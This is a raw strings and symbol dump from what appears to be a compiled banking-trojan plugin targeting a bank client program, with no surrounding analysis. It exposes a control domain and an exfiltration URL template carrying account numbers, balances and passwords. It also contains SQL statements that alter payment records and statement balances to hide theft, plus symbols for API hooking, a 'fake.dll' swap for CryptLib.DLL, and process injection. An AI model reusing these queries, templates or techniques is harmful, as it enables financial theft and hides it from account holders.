TMemory::TMemory
TMemory::~TMemory
TMemory::AsStr
File::IsExists
FileName
TBotObject::TBotObject
ODBC::ODBC
ODBC::~ODBC
ODBC::`scalar deleting destructor'
CBank::CloseDB
CBank::CreateDB
CBank::GetAdminUrl
rus.zika.in
CBank::InitData
CBank::SumToInt
CBank::ValueToInt
CBank::ReadDate
CBank::ReadString
MemPtr<512>::MemPtr<512>
MemPtr<512>::~MemPtr<512>
MemPtr<512>::operator char *
MemPtr<512>::str
TString<char>::t_str
BBS_CALC::DBGOutMessage<char const *,char const *,unsigned char *>
Module
BBS_CALC::DBGOutMessage<char const *,char const *>
Module
pushargEx<1,1033466613,47,int>
newfunc
BBS_CALC::DBGOutMessage<char const *,char const *,char *,char *>
Module
BBS_CALC::DBGOutMessage<char const *,char const *,char *>
Module
pushargEx<1,2000917480,50,int,char *,unsigned int>
newfunc
pushargEx<1,1539428687,94,int,int>
newfunc
pushargEx<1,4224075867,187,void *,tagPROCESSENTRY32W *>
newfunc
pushargEx<1,2577672605,90,int,int,unsigned long>
newfunc
pushargEx<18,3841663377,514,void *,int,char *,int>
newfunc
pushargEx<1,1916711125,17,void *>
newfunc
pushargEx<1,2557808435,188,void *,tagPROCESSENTRY32W *>
newfunc
pushargEx<19,3873697281,521,char *>
newfunc
pushargEx<1,1493072574,54,unsigned int,char *>
newfunc
pushargEx<19,4167737846,524,char *,char *>
newfunc
pushargEx<1,168244599,169,char *,int>
newfunc
pushargEx<19,4167737846,524,char *,char const *>
newfunc
BBS_CALC::DBGOutMessage<char const *,char const *,char *,unsigned long>
Module
BBS_CALC::DBGOutMessage<char const *,char const *,unsigned short,unsigned short,short>
Module
BBS_CALC::DBGOutMessage<char const *,char const *,unsigned long,unsigned long>
Module
pushargEx<1,2180051167,35,char *>
newfunc
pushargEx<1,1764098386,109>
newfunc
STRBUF::GetRec<char>
CBank::HandlerSQLDriverConnectA
ConnectionHandle
WindowHandle
InConnectionString
StringLength1
OutConnectionString
BufferLength
StringLength2Ptr
DriverCompletion
StringConnect='%s'
CBank::SetHooks
CBank::IsRunBClient
CBank::ReadReplacement
: %s %s
 %02d.%02d.%02d
: %s, 
CBank::HidePayments
dateFirst
pwsprintfA
sqlBuf
it is16 it
update PAYDOCRU set DOCUMENTDATE=?, STATUS=30001 where PAYERACCOUNT=? and DOCUMENTDATE=? and DOCUMENTNUMBER like '%%%s%%'
 %s %s
select min(DOCUMENTDATE) from PAYDOCRU
STRBUF::Release<char>
TString<char>::~TString<char>
CBank::GrabAndSendBalance
__formal
Account
Response
pwsprintfA
http://%s/set/bal.html?uid=%s&type=bss&sum=%s&acc=%s&pass=%s&cid=%s
Rest=%s, Account=%s
select Rest,Account from Account
os31 os31
CBank::SendCBank
folderSize
cryptName
folderCBank
tempFolder
CBankClient
cbank_copy.txt
CBank::ReplacementBalance
pwsprintfA
sqlBuf
closingBalance
openingBalance
dateBalance
obalance
update
update ACCOUNT set REST=%s where ACCOUNT=?
select CLOSINGBALANCE from STATEMENTRU where STATEMENTDATE=(select Max(STATEMENTDATE) from STATEMENTRU) and CLOSINGBALANCE<>0
is16 it
update STATEMENTRU set OPENINGBALANCE=%d.%d, CLOSINGBALANCE = %d.%d where ACCOUNT=? and STATEMENTDATE=?
: %u, 
: %s, 
select OPENINGBALANCE,CLOSINGBALANCE,STATEMENTDATE from STATEMENTRU where ACCOUNT=? and STATEMENTDATE>=? and OPENINGBALANCE<>0 order by STATEMENTDATE
os16 os16 ot is16 it
t!SSSWS
	CBank::ThreadHideReplacement
__formal
fileFlag
CBank::InstallFakeDll
pathExe
install
TInstall2
dllBody
intaller
pathSystem
dllSize
botData
installed
 fake.dll 
 fake.dll 
 fake.dll
fake.dll 
system
CryptLib.DLL
TString<char>::`scalar deleting destructor'
CBank::WorkInCBank
__formal
folderCBank
	CBank::WaitRunCBank
__formal
Start '%s'
WaitRunCBank
CBank::Start
e:\projects\progs\petrosjan\bjwj\builds\bot_plug\objs\release debugconfig\vc90.pdb
@comp.id	x
@feat.00
.drectve
.debug$S
.rdata
.rdata
.debug$S
.rdata
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.rdata
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.rdata
.debug$S
_domain
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.rdata
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.debug$S
.rdata
.rdata
.debug$S
.debug$S
.debug$S
.rdata
.rdata
.rdata
.debug$S
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.debug$S
.debug$S
.rdata
.debug$S
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.debug$S
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.debug$S
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.debug$S
.rdata
.debug$S
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.rdata
.debug$S
.debug$S
.rdata
.debug$S
.rdata
.rdata
.rdata
.debug$S
.debug$T
?pHandlerSQLDriverConnectA@CBank@@3P6GFPAXPAUHWND__@@PAEF2FPAFG@ZA
?pHandlerSQLPrepareA@CBank@@3P6GFPAXPAEJ@ZA
?pHandlerSQLExecDirectA@CBank@@3P6GFPAXPAEJ@ZA
?pHandlerSQLExecute@CBank@@3P6GFPAX@ZA
?Hibernation@TVideoRecDLL@@2HB
?RunCallback@TVideoRecDLL@@2HB
_restFixeds
_sizeRestFixeds
_runHideReplacement
??1TBotObject@@UAE@XZ
??_7TBotObject@@6B@
??_GTBotObject@@UAEPAXI@Z
??_ETBotObject@@UAEPAXI@Z
??_GTBotObject@@UAEPAXI@Z
??3TBotObject@@SAXPAX@Z
??0TMemory@@QAE@K@Z
?MemAlloc@@YAPAXK@Z
??1TMemory@@QAE@XZ
?MemFree@@YAXPAX@Z
?AsStr@TMemory@@QAEPADXZ
?IsExists@File@@YA_NQAD@Z
?FileExistsA@@YA_NQAD@Z
??0TBotObject@@QAE@XZ
??0ODBC@@QAE@XZ
??_7ODBC@@6B@
??_GODBC@@UAEPAXI@Z
??_EODBC@@UAEPAXI@Z
??1ODBC@@UAE@XZ
?Close@ODBC@@QAEXXZ
??_GODBC@@UAEPAXI@Z
?CloseDB@CBank@@YAXPAVODBC@@@Z
?CreateDB@CBank@@YAPAVODBC@@XZ
?Connect@ODBC@@QAE_NPBD@Z
_strODBCConnect
??2TBotObject@@SAPAXI@Z
?GetAdminUrl@CBank@@YAPADPAD@Z
?m_lstrcpy@@YGXPADPBD@Z
??_C@_0M@INCJPEGB@rus?4zika?4in?$AA@
?InitData@CBank@@YA_NXZ
_hidePayments
_restAccounts
?SumToInt@CBank@@YAHPBDPAH@Z
?ValueToInt@CBank@@YAHPBDPAH@Z
?ReadDate@CBank@@YAHPBDPAUtagTIMESTAMP_STRUCT@@@Z
?m_memset@@YAPAXPAXKK@Z
?ReadString@CBank@@YAHPBDPAD@Z
??0?$MemPtr@$0CAA@@@QAE@XZ
??1?$MemPtr@$0CAA@@@QAE@XZ
??B?$MemPtr@$0CAA@@@QAEPADXZ
?str@?$MemPtr@$0CAA@@@QAEPADXZ
?t_str@?$TString@D@@QBEPADXZ
??_C@_11LOCGONAA@?$AA?$AA@
??$DBGOutMessage@PBDPBDPAE@BBS_CALC@@YAXPBD0PAE@Z
?MessageEx@Debug@@YAXPADK000ZZ
??$DBGOutMessage@PBDPBD@BBS_CALC@@YAXPBD0@Z
??$pushargEx@$00$0DNJJHCPF@$0CP@H@@YAPAXH@Z
?GetProcAddressEx2@@YAPAXPADKKH@Z
??$DBGOutMessage@PBDPBDPADPAD@BBS_CALC@@YAXPBD0PAD1@Z
??$DBGOutMessage@PBDPBDPAD@BBS_CALC@@YAXPBD0PAD@Z
??$pushargEx@$00$0HHEDJDOI@$0DC@HPADI@@YAPAXHPADI@Z
??$pushargEx@$00$0FLMBNBEP@$0FO@HH@@YAPAXHH@Z
??$pushargEx@$00$0PLMGEIFL@$0LL@PAXPAUtagPROCESSENTRY32W@@@@YAPAXPAXPAUtagPROCESSENTRY32W@@@Z
??$pushargEx@$00$0JJKECJJN@$0FK@HHK@@YAPAXHHK@Z
??$pushargEx@$0BC@$0OEPLCBJB@$0CAC@PAXHPADH@@YAPAXPAXHPADH@Z
??$pushargEx@$00$0HCDOLANF@$0BB@PAX@@YAPAXPAX@Z
??$pushargEx@$00$0JIHFAPDD@$0LM@PAXPAUtagPROCESSENTRY32W@@@@YAPAXPAXPAUtagPROCESSENTRY32W@@@Z
??$pushargEx@$0BD@$0OGODOOAB@$0CAJ@PAD@@YAPAXPAD@Z
??$pushargEx@$00$0FIPOHKLO@$0DG@IPAD@@YAPAXIPAD@Z
??$pushargEx@$0BD@$0PIGKKBPG@$0CAM@PADPAD@@YAPAXPAD0@Z
??$pushargEx@$00$0KAHDFHH@$0KJ@PADH@@YAPAXPADH@Z
??$pushargEx@$0BD@$0PIGKKBPG@$0CAM@PADPBD@@YAPAXPADPBD@Z
??$DBGOutMessage@PBDPBDPADK@BBS_CALC@@YAXPBD0PADK@Z
??$DBGOutMessage@PBDPBDGGF@BBS_CALC@@YAXPBD0GGF@Z
??$DBGOutMessage@PBDPBDKK@BBS_CALC@@YAXPBD0KK@Z
??$pushargEx@$00$0IBPAPANP@$0CD@PAD@@YAPAXPAD@Z
??$pushargEx@$00$0GJCGABFC@$0GN@@@YAPAXXZ
??$GetRec@D@STRBUF@@YAAAUTStrRec@0@PAD@Z
?HandlerSQLDriverConnectA@CBank@@YGFPAXPAUHWND__@@PAEF2FPAFG@Z
??_C@_05KCBIOJJH@CBank?$AA@
??_C@_0BD@BPOFENKK@StringConnect?$DN?8?$CFs?8?$AA@
?SetHooks@CBank@@YA_NXZ
?HookApi@@YAPAXKKPAX0@Z
?IsRunBClient@CBank@@YAKPAD@Z
?GetNameHashW@File@@YAKPA_W_N@Z
?ReadReplacement@CBank@@YAXPBD@Z
??_C@_0BI@IHAKEMMB@?Q?j?p?$PL?r?h?e?5?o?k?$OA?r?e?f?j?h?3?5?$CFs?5?$CFs?$AA@
??_C@_0BE@PIFLCLLB@?D?$OA?r?$OA?5?$CF02d?4?$CF02d?4?$CF02d?$AA@
??_C@_0CL@IGJOICEA@?O?n?d?l?e?m?$OA?5?a?$OA?k?$OA?m?q?$OA?5?d?k?$PP?5?q?w?e?r?$OA?3?5?$CFs?0?5?p@
?HidePayments@CBank@@YAXXZ
??_C@_0L@JNLGEKIE@it?5is16?5it?$AA@
??_C@_02DKCKIIND@?$CFs?$AA@
??_C@_0HK@EAGNMGLN@update?5PAYDOCRU?5set?5DOCUMENTDATE@
??_C@_0BI@EBIIPLGB@?Q?j?p?$PL?b?$OA?e?l?5?o?k?$OA?r?e?f?j?s?5?$CFs?5?$CFs?$AA@
?Get_wsprintfA@@YAP6AHPADPBDZZXZ
?CloseQuery@ODBC@@QAEXPAX@Z
?ExecuteSql@ODBC@@QAAPAXPBD0ZZ
??_C@_0CH@FBOGNHJD@select?5min?$CIDOCUMENTDATE?$CJ?5from?5PA@
??_C@_02IGGBGAC@ot?$AA@
??_C@_0BC@BACCNDKH@?Q?j?p?$PL?b?$OA?e?l?5?o?k?$OA?r?e?f?j?h?$AA@
??$Release@D@STRBUF@@YAXAAPAD@Z
?Free@HEAP@@YAXPAX@Z
??1?$TString@D@@UAE@XZ
??_7?$TString@D@@6B@
??_G?$TString@D@@UAEPAXI@Z
??_E?$TString@D@@UAEPAXI@Z
?GrabAndSendBalance@CBank@@YGKPAX@Z
??_C@_0BP@HANHEPED@?M?e?5?s?d?$OA?k?n?q?$PM?5?o?n?d?j?k?$PO?w?h?r?$PM?q?$PP?5?j?5?a?$OA?g?e?$AA@
??_C@_0BF@MPLHCIOG@?G?$OA?o?p?n?q?5?m?e?5?b?$PL?o?n?k?m?h?k?q?$PP?$AA@
?Clear@HTTPResponse@@YAXPAUTHTTPResponseRec@@@Z
?Get@HTTP@@YA_NPADPAPADPAUTHTTPResponseRec@@@Z
??_C@_0BD@DDPGNANN@?N?r?q?$PL?k?$OA?e?l?5?g?$OA?o?p?n?q?5?$CFs?$AA@
??_C@_0EE@PFJMPOJF@http?3?1?1?$CFs?1set?1bal?4html?$DPuid?$DN?$CFs?$CGty@
?BOT_UID@@3PADA
?GetAzUser@@YA?AV?$TString@D@@XZ
??_C@_0M@MOGILOCL@?O?$OA?p?n?k?$PM?$DN?8?$CFs?8?$AA@
?m_memcpy@@YAPAXPAXPBXH@Z
?m_strstr@@YGPADPBD0@Z
??_C@_04EKGPJNJA@PWD?$DN?$AA@
??_C@_0BE@JDHPLJNL@Rest?$DN?$CFs?0?5Account?$DN?$CFs?$AA@
??_C@_0CB@CCGFKHGD@select?5Rest?0Account?5from?5Account@
??_C@_09HFNFHLLP@os31?5os31?$AA@
??_C@_0BP@IIFKIJFM@?F?d?e?l?5?q?r?p?n?j?h?5?o?n?d?j?k?$PO?w?e?m?h?$PP?5?j?5?a?$OA?g?e?$AA@
?SendCBank@CBank@@YGKPAX@Z
??_C@_0BP@IDJMLBPP@?J?n?o?h?p?n?b?$OA?m?h?e?5?m?$OA?5?q?e?p?b?e?p?5?n?j?n?m?w?e?m?n?$AA@
?CreateFileA@TBotApplication@@QAE?AV?$TString@D@@PBD0@Z
?SendFiles@VideoProcess@@YAKHPBD0H_N@Z
??_C@_0BG@BGOBHAAG@?J?n?o?h?p?n?b?$OA?m?h?e?5?m?$OA?5?q?e?p?b?e?p?$AA@
?CopyFileANdFolder@@YA_NPAD0@Z
??_C@_0CC@IONMLDMD@?J?n?o?h?p?n?b?$OA?m?h?e?5?b?n?5?b?p?e?l?e?m?m?s?$PO?5?o?$OA?o?j?s?5?$CF@
?DeleteFolders@@YA_NPAD@Z
?IsExists@Directory@@YA_NQAD@Z
?m_lstrlen@@YGKPBD@Z
??_C@_0CI@LJEPKDEK@?$NN?r?$OA?5?o?$OA?o?j?$OA?5?m?$OA?5?d?$OA?m?m?$PL?i?5?l?n?l?e?m?r?5?b?$PL?j?$OA?w@
?FolderIsUpload@VideoProcess@@YA_NPBD0@Z
?CryptFileName@UIDCrypt@@YAPADPBD_N@Z
??_C@_0M@PBODJNDL@CBankClient?$AA@
??_C@_0CP@IEMPBFLF@?g?$OA?o?s?q?j?5?n?r?q?$PL?k?j?h?5?o?p?n?c?p?$OA?l?l?$PL?5?m?$OA?5?q?e?p?b@
??_C@_0DG@IMBNOFEJ@?O?$OA?o?j?$OA?5?o?p?n?c?p?$OA?l?l?$PL?5?a?n?k?$PM?x?e?5?g?$OA?d?$OA?m?m?n?c?n@
?SizeFolderLess@@YA_NPBDKPAK@Z
??_C@_0BK@FAGEJPGG@?J?k?h?e?m?r?5?s?f?e?5?a?$PL?k?5?q?j?n?o?h?p?n?b?$OA?m?$AA@
?FileExists@TBotApplication@@QAE_NPBD0@Z
??_C@_0P@BIENEIJC@cbank_copy?4txt?$AA@
?Bot@@3PAVTBotApplication@@A
?Free@STR@@YAXPAD@Z
?ReplacementBalance@CBank@@YAXXZ
?WriteBufferA@File@@YAKPBDQAXK@Z
?MakeFileName@BOT@@YA?AV?$TString@D@@PBD0@Z
?GetStr@@YA?AV?$TString@D@@PBD@Z
?CBankRestFixed@@3PADA
??_C@_04HIMAAMHO@is16?$AA@
??_C@_0CL@LKBJPMLC@update?5ACCOUNT?5set?5REST?$DN?$CFs?5where@
??_C@_0HO@NEMLFJLJ@select?5CLOSINGBALANCE?5from?5STATE@
??_C@_04PHIAPJNO@os16?$AA@
?NextRow@ODBC@@QAE_NPAX@Z
??_C@_07MFNJCLPN@is16?5it?$AA@
??_C@_0GI@NNNFNLFH@update?5STATEMENTRU?5set?5OPENINGBA@
??_C@_0CO@PHIFKFHB@?M?n?b?$PL?e?5?b?u?n?d?m?n?i?5?a?$OA?k?$OA?m?q?3?5?$CFu?0?5?b?$PL?u?n?d?m@
?MemRealloc@@YAPAXPAXK@Z
?m_memcmp@@YAHPBX0I@Z
?m_lstrcmp@@YGKPBD0@Z
??_C@_0CI@GLNJHFAD@?B?u?n?d?m?n?i?5?a?$OA?k?$OA?m?q?3?5?$CFs?0?5?b?$PL?u?n?d?m?n?i?5?a?$OA?k@
??_C@_0JG@LIFJMJKG@select?5OPENINGBALANCE?0CLOSINGBAL@
??_C@_0BF@IIDHLEOE@os16?5os16?5ot?5is16?5it?$AA@
??_C@_0BE@JDGNJONO@?Q?w?e?r?5?$CFs?0?5?p?$OA?g?m?h?v?$OA?5?$CFd?$AA@
??_C@_0BN@CPIHBPGK@?N?q?s?y?e?q?r?b?k?$PP?e?l?5?o?n?d?l?e?m?s?5?a?$OA?k?$OA?m?q?$OA?$AA@
?ThreadHideReplacement@CBank@@YGKPAX@Z
?RecordPID@VideoProcess@@YA_NHPBDKHH@Z
?CBankReplacement@@3PADA
??_C@_0BJ@BCGNMNDL@?G?$OA?o?s?q?j?5?o?n?d?l?e?m?$PL?5?h?5?q?j?p?$PL?r?h?$PP?$AA@
?CBankFlagUpdate@@3PADA
?ReadToBufferA@File@@YAPAEPBDAAK@Z
?InstallFakeDll@CBank@@YGKPAX@Z
??1TPlugin@@UAE@XZ
?EStrFakeDllCBankFlag@@3PADA
??_C@_0CG@HFJANHME@?H?m?q?r?$OA?k?$PP?v?h?$PP?5fake?4dll?5?s?q?o?e?x?m?n?5?b?$PL?o?n@
??_C@_0CB@HPHHGMH@?H?m?q?r?$OA?k?$PP?v?h?$PP?5fake?4dll?5?m?e?5?b?$PL?o?n?k?m?e?m?$OA@
?KillBlockingProcesses@@YAXPBD@Z
?GetProcAddress@TMemoryDLL@@QAE_NKAAPAX@Z
??_C@_0CN@KFPPHDDH@?O?k?$OA?c?h?m?5?s?q?o?e?x?m?n?5?g?$OA?c?p?s?f?e?m?$PL?0?5?m?$OA?w?h?m?$OA@
?LoadBotPlug@@YGHPAPAXPAK@Z
??_C@_0BM@IEBKDNGC@?O?k?$OA?c?h?m?5?m?e?5?s?d?$OA?k?n?q?$PM?5?g?$OA?c?p?s?g?h?r?$PM?$AA@
?Download@TPlugin@@QAE_N_N@Z
??0TPlugin@@QAE@ABV?$TString@D@@@Z
?EStrFakeDllInstaller@@3PADA
??_C@_0BN@EINGLELF@?M?$OA?w?h?m?$OA?e?l?5?h?m?q?r?$OA?k?$PP?v?h?$PO?5fake?4dll?$AA@
??_C@_0BJ@JEEDAMPC@fake?4dll?5?s?f?e?5?s?q?r?$OA?m?n?b?k?e?m?$OA?$AA@
?FakeDllCBankInstalled@BOT@@YA_NXZ
??_C@_06FHFOAHML@system?$AA@
??_C@_0N@IMDPHKCD@CryptLib?4DLL?$AA@
??_G?$TString@D@@UAEPAXI@Z
?WorkInCBank@CBank@@YGKPAX@Z
?RunThread@@YAXPAX0@Z
?StartThread@@YGPAXPAX0@Z
??_C@_0BN@INAJPDJ@?G?$OA?h?m?f?e?j?r?h?k?h?q?$PM?5?b?5?o?p?n?v?e?q?q?5?8?$CFs?8?$AA@
?Initialize@BOT@@YAXW4TProcessType@@@Z
?WaitRunCBank@CBank@@YGXPAX@Z
?New@STR@@YAPADPADK@Z
?InjectIntoProcess@@YA_NKP6GKPAX@Z@Z
??_C@_0L@FIBPOKKE@Start?5?8?$CFs?8?$AA@
??_C@_05PCLGFONP@?QBank?$AA@
??_C@_0N@GMAGFDBL@WaitRunCBank?$AA@
?Start@CBank@@YAXXZ